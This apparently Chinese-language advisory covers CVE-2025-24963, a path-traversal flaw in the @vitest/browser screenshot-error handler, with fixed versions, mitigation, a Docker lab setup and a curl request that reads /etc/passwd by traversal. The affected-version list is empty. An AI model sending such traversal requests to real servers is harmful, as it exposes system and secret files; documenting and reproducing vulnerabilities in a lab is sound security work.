CVE-2025-24963 是一个中等严重性的漏洞(CVSS 3.1 评分:5.9),影响 @vitest/browser 包,该包是 Vitest 测试框架的组件,基于 Vite 开发。该漏洞源于浏览器模式 HTTP 服务器的 __screenshot-error 处理程序中对输入验证不当。当服务器通过配置选项 browser.api.host: true 暴露于网络时,攻击者可以发送特制请求以访问服务器文件系统上的任意文件,可能导致敏感信息未授权泄露。
该漏洞影响以下版本的 @vitest/browser:
此问题已在版本 2.1.9 和 3.0.4 中得到修复。强烈建议用户升级到这些版本或更高版本以缓解漏洞。
如果无法立即升级,临时的解决方案是避免将浏览器模式服务器暴露于网络,不在配置中设置 browser.api.host: true。这将阻止外部访问存在漏洞的处理程序。
git clone https://github.com/0xdeviner/CVE-2025-24963.git
cd CVE-2025-24963/vitest-vuln-demo
docker build -t vitest-cve-2025-24963 .
docker run -itd --name vitest-cve -p 63315:63315 vitest-cve-2025-24963
注意:Vitest 使用的端口是动态的(例如 63315)。你可能需要监控日志并相应调整 -p 标志。
curl "http://<IP>:63315/__screenshot-error?file=../../../../../../etc/passwd"